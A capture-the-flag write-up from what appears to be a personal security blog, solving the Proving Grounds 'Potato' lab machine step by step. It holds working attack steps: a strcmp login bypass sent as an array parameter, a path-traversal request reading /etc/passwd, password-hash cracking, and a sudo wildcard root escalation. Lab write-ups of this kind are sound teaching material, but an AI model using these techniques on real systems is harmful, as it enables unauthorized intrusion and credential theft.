<!DOCTYPE html>
<html lang="en-US">
  <head>
    <meta charset="utf-8">
    <meta name="viewport" content="width=device-width,initial-scale=1">
    <title>Potato | 0x4vian | </title>
    <meta name="generator" content="VuePress 1.8.2">
    <link rel="icon" href="/logo.png">
    <meta name="description" content="Official Website">
    
    <link rel="preload" href="/assets/css/0.styles.cebb0caa.css" as="style"><link rel="preload" href="/assets/js/app.864ab08f.js" as="script"><link rel="preload" href="/assets/js/2.c3593e62.js" as="script"><link rel="preload" href="/assets/js/15.2a78373a.js" as="script"><link rel="prefetch" href="/assets/js/10.308f3211.js"><link rel="prefetch" href="/assets/js/11.5e658592.js"><link rel="prefetch" href="/assets/js/12.a49cad18.js"><link rel="prefetch" href="/assets/js/13.65c24f1e.js"><link rel="prefetch" href="/assets/js/14.52d01b1e.js"><link rel="prefetch" href="/assets/js/16.c4f1eb31.js"><link rel="prefetch" href="/assets/js/3.f2fda5b1.js"><link rel="prefetch" href="/assets/js/4.0d6a4e40.js"><link rel="prefetch" href="/assets/js/5.13f61d06.js"><link rel="prefetch" href="/assets/js/6.49b1e1bc.js"><link rel="prefetch" href="/assets/js/7.30403789.js"><link rel="prefetch" href="/assets/js/8.12ceaa0c.js"><link rel="prefetch" href="/assets/js/9.5dcdb981.js">
    <link rel="stylesheet" href="/assets/css/0.styles.cebb0caa.css">
  </head>
  <body>
    <div id="app" data-server-rendered="true"><div class="theme-container"><header class="navbar"><div class="sidebar-button"><svg xmlns="http://www.w3.org/2000/svg" aria-hidden="true" role="img" viewBox="0 0 448 512" class="icon"><path fill="currentColor" d="M436 124H12c-6.627 0-12-5.373-12-12V80c0-6.627 5.373-12 12-12h424c6.627 0 12 5.373 12 12v32c0 6.627-5.373 12-12 12zm0 160H12c-6.627 0-12-5.373-12-12v-32c0-6.627 5.373-12 12-12h424c6.627 0 12 5.373 12 12v32c0 6.627-5.373 12-12 12zm0 160H12c-6.627 0-12-5.373-12-12v-32c0-6.627 5.373-12 12-12h424c6.627 0 12 5.373 12 12v32c0 6.627-5.373 12-12 12z"></path></svg></div> <a href="/" class="home-link router-link-active"><!----> <span class="site-name">0x4vian | </span></a> <div class="links"><!----> <nav class="nav-links can-hide"><div class="nav-item"><a href="/" class="nav-link">
  Home
</a></div><div class="nav-item"><a href="/about/" class="nav-link">
  About
</a></div><div class="nav-item"><a href="/certs/" class="nav-link">
  Certifications
</a></div><div class="nav-item"><a href="/blog/" class="nav-link router-link-active">
  Blog
</a></div> <!----></nav></div></header> <div class="sidebar-mask"></div> <aside class="sidebar"><nav class="nav-links"><div class="nav-item"><a href="/" class="nav-link">
  Home
</a></div><div class="nav-item"><a href="/about/" class="nav-link">
  About
</a></div><div class="nav-item"><a href="/certs/" class="nav-link">
  Certifications
</a></div><div class="nav-item"><a href="/blog/" class="nav-link router-link-active">
  Blog
</a></div> <!----></nav>  <ul class="sidebar-links"><li><section class="sidebar-group depth-0"><p class="sidebar-heading open"><span>Blog</span> <!----></p> <ul class="sidebar-links sidebar-group-items"><li><a href="/blog/potato.html" aria-current="page" class="active sidebar-link">Potato</a><ul class="sidebar-sub-headers"><li class="sidebar-sub-header"><a href="/blog/potato.html#summary" class="sidebar-link">Summary</a></li><li class="sidebar-sub-header"><a href="/blog/potato.html#foothold" class="sidebar-link">Foothold</a></li><li class="sidebar-sub-header"><a href="/blog/potato.html#getting-user" class="sidebar-link">Getting User</a></li><li class="sidebar-sub-header"><a href="/blog/potato.html#getting-root" class="sidebar-link">Getting Root</a></li></ul></li></ul></section></li></ul> </aside> <main class="page"> <div class="theme-default-content content__default"><h1 id="potato">Potato</h1> <p>Offsec proving ground Potato writeup
You can download the image for this machine from : [<a href="https://www.vulnhub.com/entry/infosec-prep-oscp,508/" target="_blank" rel="noopener noreferrer">Here<span><svg xmlns="http://www.w3.org/2000/svg" aria-hidden="true" focusable="false" x="0px" y="0px" viewBox="0 0 100 100" width="15" height="15" class="icon outbound"><path fill="currentColor" d="M18.8,85.1h56l0,0c2.2,0,4-1.8,4-4v-32h-8v28h-48v-48h28v-8h-32l0,0c-2.2,0-4,1.8-4,4v56C14.8,83.3,16.6,85.1,18.8,85.1z"></path> <polygon fill="currentColor" points="45.7,48.7 51.3,54.3 77.2,28.5 77.2,37.2 85.2,37.2 85.2,14.9 62.8,14.9 62.8,22.9 71.5,22.9"></polygon></svg> <span class="sr-only">(opens new window)</span></span></a>]</p> <h2 id="summary">Summary</h2> <table><thead><tr><th>Machine Name</th> <th>IP</th></tr></thead> <tbody><tr><td>Potato</td> <td>192.168.186.101</td></tr></tbody></table> <h2 id="foothold">Foothold</h2> <p>Lets start by doing the nmap scan of the box</p> <div class="language-bash extra-class"><pre class="language-bash"><code>$ nmap -sV -sT -sC -o nmapinitial <span class="token number">192.168</span>.186.101                                                                                             <span class="token number">130</span> ⨯
Starting Nmap <span class="token number">7.91</span> <span class="token punctuation">(</span> https://nmap.org <span class="token punctuation">)</span> at <span class="token number">2021</span>-07-30 03:57 EDT
Nmap scan report <span class="token keyword">for</span> <span class="token number">192.168</span>.186.101
Host is up <span class="token punctuation">(</span><span class="token number">0</span>.061s latency<span class="token punctuation">)</span>.
Not shown: <span class="token number">998</span> closed ports
PORT   STATE SERVICE VERSION
<span class="token number">22</span>/tcp <span class="token function">open</span>  <span class="token function">ssh</span>     OpenSSH <span class="token number">8</span>.2p1 Ubuntu 4ubuntu0.1 <span class="token punctuation">(</span>Ubuntu Linux<span class="token punctuation">;</span> protocol <span class="token number">2.0</span><span class="token punctuation">)</span>
<span class="token operator">|</span> ssh-hostkey: 
<span class="token operator">|</span>   <span class="token number">3072</span> ef:24:0e:ab:d2:b3:16:b4:4b:2e:27:c0:5f:48:79:8b <span class="token punctuation">(</span>RSA<span class="token punctuation">)</span>
<span class="token operator">|</span>   <span class="token number">256</span> f2:d8:35:3f:49:59:85:85:07:e6:a2:0e:65:7a:8c:4b <span class="token punctuation">(</span>ECDSA<span class="token punctuation">)</span>
<span class="token operator">|</span>_  <span class="token number">256</span> 0b:23:89:c3:c0:26:d5:64:5e:93:b7:ba:f5:14:7f:3e <span class="token punctuation">(</span>ED25519<span class="token punctuation">)</span>
<span class="token number">80</span>/tcp <span class="token function">open</span>  http    Apache httpd <span class="token number">2.4</span>.41 <span class="token variable"><span class="token punctuation">((</span>Ubuntu<span class="token punctuation">))</span></span>
<span class="token operator">|</span>_http-server-header: Apache/2.4.41 <span class="token punctuation">(</span>Ubuntu<span class="token punctuation">)</span>
<span class="token operator">|</span>_http-title: Potato company
Service Info: OS: Linux<span class="token punctuation">;</span> CPE: cpe:/o:linux:linux_kernel

</code></pre></div><p><code>Port 80</code> seems interesting lets visit it. While checking for <code>POrt 80</code> Lets run full port scan.</p> <div class="language-bash extra-class"><pre class="language-bash"><code>$ nmap -p- <span class="token number">192.168</span>.186.101 -o nmap-fullscan
</code></pre></div><p>We just saw the static page saying <strong>Potato Company</strong> and nothing else while visiting post 80. Let's run <code>dirsearch</code> and see if there is any hidden directory.</p> <div class="language-bash extra-class"><pre class="language-bash"><code>dirsearch -u http://192.168.186.101/

  _<span class="token operator">|</span><span class="token builtin class-name">.</span> _ _  _  _  _ _<span class="token operator">|</span>_    v0.4.1
 <span class="token punctuation">(</span>_<span class="token operator">||</span><span class="token operator">|</span> _<span class="token punctuation">)</span> <span class="token punctuation">(</span>/_<span class="token punctuation">(</span>_<span class="token operator">||</span> <span class="token punctuation">(</span>_<span class="token operator">|</span> <span class="token punctuation">)</span>

Extensions: php, aspx, jsp, html, js <span class="token operator">|</span> HTTP method: GET <span class="token operator">|</span> Threads: <span class="token number">30</span> <span class="token operator">|</span> Wordlist size: <span class="token number">10877</span>

Output File: /home/avi/.dirsearch/reports/192.168.186.101/_21-07-30_04-30-21.txt

Error Log: /home/avi/.dirsearch/logs/errors-21-07-30_04-30-21.log

Target: http://192.168.186.101/

<span class="token punctuation">[</span>04:30:22<span class="token punctuation">]</span> Starting: 
<span class="token punctuation">[</span>04:30:26<span class="token punctuation">]</span> <span class="token number">403</span> -  280B  - /.ht_wsr.txt                                                                                                             
<span class="token punctuation">[</span>04:30:26<span class="token punctuation">]</span> <span class="token number">403</span> -  280B  - /.htaccess.bak1
<span class="token punctuation">[</span>04:30:26<span class="token punctuation">]</span> <span class="token number">403</span> -  280B  - /.htaccess.orig
<span class="token punctuation">[</span>04:30:26<span class="token punctuation">]</span> <span class="token number">403</span> -  280B  - /.htaccess.sample
<span class="token punctuation">[</span>04:30:26<span class="token punctuation">]</span> <span class="token number">403</span> -  280B  - /.htaccess.save
<span class="token punctuation">[</span>04:30:26<span class="token punctuation">]</span> <span class="token number">403</span> -  280B  - /.htaccess_extra
<span class="token punctuation">[</span>04:30:26<span class="token punctuation">]</span> <span class="token number">403</span> -  280B  - /.htaccess_orig
<span class="token punctuation">[</span>04:30:26<span class="token punctuation">]</span> <span class="token number">403</span> -  280B  - /.htaccess_sc
<span class="token punctuation">[</span>04:30:26<span class="token punctuation">]</span> <span class="token number">403</span> -  280B  - /.htaccessOLD
<span class="token punctuation">[</span>04:30:26<span class="token punctuation">]</span> <span class="token number">403</span> -  280B  - /.htaccessBAK
<span class="token punctuation">[</span>04:30:26<span class="token punctuation">]</span> <span class="token number">403</span> -  280B  - /.htaccessOLD2
<span class="token punctuation">[</span>04:30:26<span class="token punctuation">]</span> <span class="token number">403</span> -  280B  - /.htm            
<span class="token punctuation">[</span>04:30:26<span class="token punctuation">]</span> <span class="token number">403</span> -  280B  - /.html
<span class="token punctuation">[</span>04:30:26<span class="token punctuation">]</span> <span class="token number">403</span> -  280B  - /.htpasswd_test
<span class="token punctuation">[</span>04:30:26<span class="token punctuation">]</span> <span class="token number">403</span> -  280B  - /.htpasswds
<span class="token punctuation">[</span>04:30:26<span class="token punctuation">]</span> <span class="token number">403</span> -  280B  - /.httr-oauth          
<span class="token punctuation">[</span>04:30:27<span class="token punctuation">]</span> <span class="token number">403</span> -  280B  - /.php                                                   
<span class="token punctuation">[</span>04:30:37<span class="token punctuation">]</span> <span class="token number">301</span> -  318B  - /admin  -<span class="token operator">&gt;</span>  http://192.168.186.101/admin/                                              
<span class="token punctuation">[</span>04:30:37<span class="token punctuation">]</span> <span class="token number">200</span> -  466B  - /admin/?/login                      
<span class="token punctuation">[</span>04:30:37<span class="token punctuation">]</span> <span class="token number">403</span> -  280B  - /admin/.htaccess
<span class="token punctuation">[</span>04:30:38<span class="token punctuation">]</span> <span class="token number">200</span> -  466B  - /admin/                            
<span class="token punctuation">[</span>04:30:38<span class="token punctuation">]</span> <span class="token number">200</span> -  466B  - /admin/index.php                                                                              
<span class="token punctuation">[</span>04:30:38<span class="token punctuation">]</span> <span class="token number">200</span> -    1KB - /admin/logs/                   
<span class="token punctuation">[</span>04:30:58<span class="token punctuation">]</span> <span class="token number">200</span> -  245B  - /index.php                                                                                          
<span class="token punctuation">[</span>04:30:58<span class="token punctuation">]</span> <span class="token number">200</span> -  245B  - /index.php/login/         
<span class="token punctuation">[</span>04:31:09<span class="token punctuation">]</span> <span class="token number">403</span> -  280B  - /server-status/                                                                                        
<span class="token punctuation">[</span>04:31:09<span class="token punctuation">]</span> <span class="token number">403</span> -  280B  - /server-status               
                                                                                                                              
Task Completed                                  
</code></pre></div><p>We see couple of interesting directories <code>/admin</code> <code>/admin/logs</code></p> <p>Lets visit <code>/admin/logs/</code>
It contains 3 logs upon visiting <code>log_03.txt</code> we see:</p> <div class="language-docs extra-class"><pre class="language-text"><code>Operation: password change                             
Date: August 2, 2020 / 9:25 p.m.
User: admin                  
Status: OK
</code></pre></div><p>We got the username <code>admin</code>.</p> <p>Lets try to login to admin panel using admin username and common passwords. But none of them worked 😦</p> <p>Let's check our nmap full port scan</p> <div class="language-bash extra-class"><pre class="language-bash"><code>$ nmap -p- <span class="token number">192.168</span>.186.101 -o nmap-fullscan
Not shown: <span class="token number">61793</span> closed ports, <span class="token number">3739</span> filtered ports
PORT     STATE SERVICE
<span class="token number">22</span>/tcp   <span class="token function">open</span>  <span class="token function">ssh</span>
<span class="token number">80</span>/tcp   <span class="token function">open</span>  http
<span class="token number">2112</span>/tcp <span class="token function">open</span>  kip

</code></pre></div><p>We saw new <code>Port 2122</code> open. Lets check whats hosted in that port.</p> <div class="language-bash extra-class"><pre class="language-bash"><code>$ telnet <span class="token number">192.168</span>.186.101 <span class="token number">2112</span>
Trying <span class="token number">192.168</span>.186.101<span class="token punctuation">..</span>.
Connected to <span class="token number">192.168</span>.186.101.
Escape character is <span class="token string">'^]'</span><span class="token builtin class-name">.</span>
<span class="token number">220</span> ProFTPD Server <span class="token punctuation">(</span>Debian<span class="token punctuation">)</span> <span class="token punctuation">[</span>::ffff:192.168.186.101<span class="token punctuation">]</span>

</code></pre></div><p>Looks like its FTP. Let's try anonymous login to ftp.</p> <div class="language-bash extra-class"><pre class="language-bash"><code>$ <span class="token function">ftp</span> <span class="token number">192.168</span>.186.101 <span class="token number">2112</span>
Connected to <span class="token number">192.168</span>.186.101.
<span class="token number">220</span> ProFTPD Server <span class="token punctuation">(</span>Debian<span class="token punctuation">)</span> <span class="token punctuation">[</span>::ffff:192.168.186.101<span class="token punctuation">]</span>
Name <span class="token punctuation">(</span><span class="token number">192.168</span>.186.101:avi<span class="token punctuation">)</span>: anonymous
<span class="token number">331</span> Anonymous login ok, send your complete email address as your password
Password:
<span class="token number">230</span>-Welcome, archive user anonymous@192.168.49.186 <span class="token operator">!</span>
<span class="token number">230</span>-
<span class="token number">230</span>-The <span class="token builtin class-name">local</span> <span class="token function">time</span> is: Fri Jul <span class="token number">30</span> 08:39:42 <span class="token number">2021</span>
<span class="token number">230</span>-
<span class="token number">230</span> Anonymous access granted, restrictions apply
Remote system <span class="token builtin class-name">type</span> is UNIX.
Using binary mode to transfer files.
ftp<span class="token operator">&gt;</span> 

</code></pre></div><p>Successfully logged on to ftp. There are two files <code>index.php.bak</code> and <code>welcome.msg</code> .</p> <p><code>index.php.bak</code> seems interesting lets download the file and see the content.</p> <div class="language-bash extra-class"><pre class="language-bash"><code>ftp<span class="token operator">&gt;</span> get index.php.bak /tmp/index.php
local: /tmp/index.php remote: index.php.bak
<span class="token number">200</span> PORT <span class="token builtin class-name">command</span> successful
<span class="token number">150</span> Opening BINARY mode data connection <span class="token keyword">for</span> index.php.bak <span class="token punctuation">(</span><span class="token number">901</span> bytes<span class="token punctuation">)</span>
<span class="token number">226</span> Transfer complete
<span class="token number">901</span> bytes received <span class="token keyword">in</span> <span class="token number">0.00</span> secs <span class="token punctuation">(</span><span class="token number">6.2265</span> MB/s<span class="token punctuation">)</span>
ftp<span class="token operator">&gt;</span> 

</code></pre></div><p>Content of index.php.bak</p> <div class="language-php extra-class"><pre class="language-php"><code><span class="token tag"><span class="token tag"><span class="token punctuation">&lt;</span>html</span><span class="token punctuation">&gt;</span></span>
<span class="token tag"><span class="token tag"><span class="token punctuation">&lt;</span>head</span><span class="token punctuation">&gt;</span></span><span class="token tag"><span class="token tag"><span class="token punctuation">&lt;/</span>head</span><span class="token punctuation">&gt;</span></span>
<span class="token tag"><span class="token tag"><span class="token punctuation">&lt;</span>body</span><span class="token punctuation">&gt;</span></span>

<span class="token php language-php"><span class="token delimiter important">&lt;?php</span>

<span class="token variable">$pass</span><span class="token operator">=</span> <span class="token string double-quoted-string">&quot;potato&quot;</span><span class="token punctuation">;</span> <span class="token comment">//note Change this password regularly</span>

<span class="token keyword">if</span><span class="token punctuation">(</span><span class="token variable">$_GET</span><span class="token punctuation">[</span><span class="token string single-quoted-string">'login'</span><span class="token punctuation">]</span><span class="token operator">===</span><span class="token string double-quoted-string">&quot;1&quot;</span><span class="token punctuation">)</span><span class="token punctuation">{</span>
  <span class="token keyword">if</span> <span class="token punctuation">(</span><span class="token function">strcmp</span><span class="token punctuation">(</span><span class="token variable">$_POST</span><span class="token punctuation">[</span><span class="token string single-quoted-string">'username'</span><span class="token punctuation">]</span><span class="token punctuation">,</span> <span class="token string double-quoted-string">&quot;admin&quot;</span><span class="token punctuation">)</span> <span class="token operator">==</span> <span class="token number">0</span>  <span class="token operator">&amp;&amp;</span> <span class="token function">strcmp</span><span class="token punctuation">(</span><span class="token variable">$_POST</span><span class="token punctuation">[</span><span class="token string single-quoted-string">'password'</span><span class="token punctuation">]</span><span class="token punctuation">,</span> <span class="token variable">$pass</span><span class="token punctuation">)</span> <span class="token operator">==</span> <span class="token number">0</span><span class="token punctuation">)</span> <span class="token punctuation">{</span>
    <span class="token keyword">echo</span> <span class="token string double-quoted-string">&quot;Welcome! &lt;/br&gt; Go to the &lt;a href=\&quot;dashboard.php\&quot;&gt;dashboard&lt;/a&gt;&quot;</span><span class="token punctuation">;</span>
    <span class="token function">setcookie</span><span class="token punctuation">(</span><span class="token string single-quoted-string">'pass'</span><span class="token punctuation">,</span> <span class="token variable">$pass</span><span class="token punctuation">,</span> <span class="token function">time</span><span class="token punctuation">(</span><span class="token punctuation">)</span> <span class="token operator">+</span> <span class="token number">365</span><span class="token operator">*</span><span class="token number">24</span><span class="token operator">*</span><span class="token number">3600</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
  <span class="token punctuation">}</span><span class="token keyword">else</span><span class="token punctuation">{</span>
    <span class="token keyword">echo</span> <span class="token string double-quoted-string">&quot;&lt;p&gt;Bad login/password! &lt;/br&gt; Return to the &lt;a href=\&quot;index.php\&quot;&gt;login page&lt;/a&gt; &lt;p&gt;&quot;</span><span class="token punctuation">;</span>
  <span class="token punctuation">}</span>
  <span class="token keyword">exit</span><span class="token punctuation">(</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
<span class="token punctuation">}</span>
<span class="token delimiter important">?&gt;</span></span>


  <span class="token tag"><span class="token tag"><span class="token punctuation">&lt;</span>form</span> <span class="token attr-name">action</span><span class="token attr-value"><span class="token punctuation attr-equals">=</span><span class="token punctuation">&quot;</span>index.php?login=1<span class="token punctuation">&quot;</span></span> <span class="token attr-name">method</span><span class="token attr-value"><span class="token punctuation attr-equals">=</span><span class="token punctuation">&quot;</span>POST<span class="token punctuation">&quot;</span></span><span class="token punctuation">&gt;</span></span>
                <span class="token tag"><span class="token tag"><span class="token punctuation">&lt;</span>h1</span><span class="token punctuation">&gt;</span></span>Login<span class="token tag"><span class="token tag"><span class="token punctuation">&lt;/</span>h1</span><span class="token punctuation">&gt;</span></span>
                <span class="token tag"><span class="token tag"><span class="token punctuation">&lt;</span>label</span><span class="token punctuation">&gt;</span></span><span class="token tag"><span class="token tag"><span class="token punctuation">&lt;</span>b</span><span class="token punctuation">&gt;</span></span>User:<span class="token tag"><span class="token tag"><span class="token punctuation">&lt;/</span>b</span><span class="token punctuation">&gt;</span></span><span class="token tag"><span class="token tag"><span class="token punctuation">&lt;/</span>label</span><span class="token punctuation">&gt;</span></span>
                <span class="token tag"><span class="token tag"><span class="token punctuation">&lt;</span>input</span> <span class="token attr-name">type</span><span class="token attr-value"><span class="token punctuation attr-equals">=</span><span class="token punctuation">&quot;</span>text<span class="token punctuation">&quot;</span></span> <span class="token attr-name">name</span><span class="token attr-value"><span class="token punctuation attr-equals">=</span><span class="token punctuation">&quot;</span>username<span class="token punctuation">&quot;</span></span> <span class="token attr-name">required</span><span class="token punctuation">&gt;</span></span>
                <span class="token tag"><span class="token tag"><span class="token punctuation">&lt;/</span>br</span><span class="token punctuation">&gt;</span></span>
                <span class="token tag"><span class="token tag"><span class="token punctuation">&lt;</span>label</span><span class="token punctuation">&gt;</span></span><span class="token tag"><span class="token tag"><span class="token punctuation">&lt;</span>b</span><span class="token punctuation">&gt;</span></span>Password:<span class="token tag"><span class="token tag"><span class="token punctuation">&lt;/</span>b</span><span class="token punctuation">&gt;</span></span><span class="token tag"><span class="token tag"><span class="token punctuation">&lt;/</span>label</span><span class="token punctuation">&gt;</span></span>
                <span class="token tag"><span class="token tag"><span class="token punctuation">&lt;</span>input</span> <span class="token attr-name">type</span><span class="token attr-value"><span class="token punctuation attr-equals">=</span><span class="token punctuation">&quot;</span>password<span class="token punctuation">&quot;</span></span> <span class="token attr-name">name</span><span class="token attr-value"><span class="token punctuation attr-equals">=</span><span class="token punctuation">&quot;</span>password<span class="token punctuation">&quot;</span></span> <span class="token attr-name">required</span><span class="token punctuation">&gt;</span></span>
                <span class="token tag"><span class="token tag"><span class="token punctuation">&lt;/</span>br</span><span class="token punctuation">&gt;</span></span>
                <span class="token tag"><span class="token tag"><span class="token punctuation">&lt;</span>input</span> <span class="token attr-name">type</span><span class="token attr-value"><span class="token punctuation attr-equals">=</span><span class="token punctuation">&quot;</span>submit<span class="token punctuation">&quot;</span></span> <span class="token attr-name">id</span><span class="token attr-value"><span class="token punctuation attr-equals">=</span><span class="token punctuation">'</span>submit<span class="token punctuation">'</span></span> <span class="token attr-name">value</span><span class="token attr-value"><span class="token punctuation attr-equals">=</span><span class="token punctuation">'</span>Login<span class="token punctuation">'</span></span> <span class="token punctuation">&gt;</span></span>
  <span class="token tag"><span class="token tag"><span class="token punctuation">&lt;/</span>form</span><span class="token punctuation">&gt;</span></span>
<span class="token tag"><span class="token tag"><span class="token punctuation">&lt;/</span>body</span><span class="token punctuation">&gt;</span></span>
<span class="token tag"><span class="token tag"><span class="token punctuation">&lt;/</span>html</span><span class="token punctuation">&gt;</span></span>

</code></pre></div><p>We got the username and password. Lets try to login to admin panel. But it doesn't work.</p> <p>Lets check the modified date of <code>index.php.bak</code> in ftp. Its <code>Aug 2</code> and in <code>log_03.txt</code> , we can see that the password for admin was changed.</p> <p>Let's check the login logic for the admin panel</p> <div class="language-php extra-class"><pre class="language-php"><code> <span class="token keyword">if</span> <span class="token punctuation">(</span><span class="token function">strcmp</span><span class="token punctuation">(</span><span class="token variable">$_POST</span><span class="token punctuation">[</span><span class="token string single-quoted-string">'username'</span><span class="token punctuation">]</span><span class="token punctuation">,</span> <span class="token string double-quoted-string">&quot;admin&quot;</span><span class="token punctuation">)</span> <span class="token operator">==</span> <span class="token number">0</span>  <span class="token operator">&amp;&amp;</span> <span class="token function">strcmp</span><span class="token punctuation">(</span><span class="token variable">$_POST</span><span class="token punctuation">[</span><span class="token string single-quoted-string">'password'</span><span class="token punctuation">]</span><span class="token punctuation">,</span> <span class="token variable">$pass</span><span class="token punctuation">)</span> <span class="token operator">==</span> <span class="token number">0</span><span class="token punctuation">)</span>
</code></pre></div><p>It is using strcmp to check for the password.
After goolging abit, we find strcmp returns 3 results.</p> <div class="language- extra-class"><pre class="language-text"><code>Returns &lt; 0 if str1 is less than str2; &gt; 0 if str1 is greater than str2, and 0 if they are equal
</code></pre></div><p>So we have to bypass this comparison and return 0. We can do this by passing array for password.</p> <p>Let's fire burp and login to admin pannel.</p> <p>Simply change the http request</p> <div class="language- extra-class"><pre class="language-text"><code>POST //admin/index.php?login=1 HTTP/1.1
Host: 192.168.186.101
Content-Length: 25
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://192.168.186.101
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.150 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://192.168.186.101//admin/
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Connection: close

username=admin&amp;password=a
</code></pre></div><p>To:</p> <div class="language- extra-class"><pre class="language-text"><code>POST //admin/index.php?login=1 HTTP/1.1
Host: 192.168.186.101
Content-Length: 25
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://192.168.186.101
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.150 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://192.168.186.101//admin/
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Connection: close

username=admin&amp;password[]=a
</code></pre></div><p>Now we get access to admin panel</p> <h2 id="getting-user">Getting User</h2> <p>After logging to admin panel and exploring a bit there's <code>Logs</code> using which we can view the logs.</p> <p>The request to view log is</p> <div class="language- extra-class"><pre class="language-text"><code>POST //admin/dashboard.php?page=log HTTP/1.1
Host: 192.168.186.101
Content-Length: 15
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://192.168.186.101
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.150 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://192.168.186.101//admin/dashboard.php?page=log
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: pass=serdesfsefhijosefjtfgyuhjiosefdfthgyjh
Connection: close

file=log_01.txt
</code></pre></div><p><code>file=log_01.txt</code> , it looks like it is showing file from <code>/admin/logs/</code>.
Let's try to read something interestring.</p> <div class="language- extra-class"><pre class="language-text"><code>POST //admin/dashboard.php?page=log HTTP/1.1
Host: 192.168.186.101
Content-Length: 33
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://192.168.186.101
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.150 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://192.168.186.101//admin/dashboard.php?page=log
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: pass=serdesfsefhijosefjtfgyuhjiosefdfthgyjh
Connection: close

file=../../../../../../etc/passwd
</code></pre></div><p>And we got the content of <code>/etc/passwd</code>.</p> <div class="language- extra-class"><pre class="language-text"><code>webadmin:$1$webadmin$3sXBxGUtDGIFAcnNTNhi6/:1001:1001:webadmin,,,:/home/webadmin:/bin/bash
</code></pre></div><p>This is interesting because it shows password for webadmin.
Save the username and password and Crack the password for webadmin using <code>john</code></p> <div class="language-bash extra-class"><pre class="language-bash"><code>$ john /tmp/crack.txt --show
webadmin:dragon
</code></pre></div><p>Now login to ssh using username and password</p> <h2 id="getting-root">Getting Root</h2> <p>Run <code>sudo -l</code> to see which command can you run as sudo.</p> <div class="language-bash extra-class"><pre class="language-bash"><code>webadmin@serv:~$ <span class="token function">sudo</span> -l
<span class="token punctuation">[</span>sudo<span class="token punctuation">]</span> password <span class="token keyword">for</span> webadmin: 
Matching Defaults entries <span class="token keyword">for</span> webadmin on serv:
    env_reset, mail_badpass, <span class="token assign-left variable">secure_path</span><span class="token operator">=</span>/usr/local/sbin<span class="token punctuation">\</span>:/usr/local/bin<span class="token punctuation">\</span>:/usr/sbin<span class="token punctuation">\</span>:/usr/bin<span class="token punctuation">\</span>:/sbin<span class="token punctuation">\</span>:/bin<span class="token punctuation">\</span>:/snap/bin

User webadmin may run the following commands on serv:
    <span class="token punctuation">(</span>ALL <span class="token builtin class-name">:</span> ALL<span class="token punctuation">)</span> /bin/nice /notes/*

</code></pre></div><p>We see we can run <code>/bin/nice /notes/*</code> as sudo.</p> <div class="language-bash extra-class"><pre class="language-bash"><code>webadmin@serv:~$ <span class="token function">ls</span> -la /notes
total <span class="token number">16</span>
drwxr-xr-x  <span class="token number">2</span> root root <span class="token number">4096</span> Aug  <span class="token number">2</span>  <span class="token number">2020</span> <span class="token builtin class-name">.</span>
drwxr-xr-x <span class="token number">21</span> root root <span class="token number">4096</span> Sep <span class="token number">28</span>  <span class="token number">2020</span> <span class="token punctuation">..</span>
-rwx------  <span class="token number">1</span> root root   <span class="token number">11</span> Aug  <span class="token number">2</span>  <span class="token number">2020</span> clear.sh
-rwx------  <span class="token number">1</span> root root    <span class="token number">8</span> Aug  <span class="token number">2</span>  <span class="token number">2020</span> id.sh
webadmin@serv:~$ 
</code></pre></div><p>Only root can edit or create files on notes. So we cant create file in /notes and do priv esc.</p> <p>But note there is <code>/notes/*</code>, so its easy to get root without creating any files simply run.</p> <div class="language-bash extra-class"><pre class="language-bash"><code>webadmin@serv:~$ <span class="token function">sudo</span> /bin/nice /notes/<span class="token punctuation">..</span>/bin/bash
root@serv:/home/webadmin<span class="token comment"># </span>
</code></pre></div><p>And we goot root to the server 😃</p> <p>Hope you learnt something from this writeup.
Happy Hacking 😃</p></div> <footer class="page-edit"><!----> <!----></footer> <!----> </main></div><div class="global-ui"></div></div>
    <script src="/assets/js/app.864ab08f.js" defer></script><script src="/assets/js/2.c3593e62.js" defer></script><script src="/assets/js/15.2a78373a.js" defer></script>
  </body>
</html>
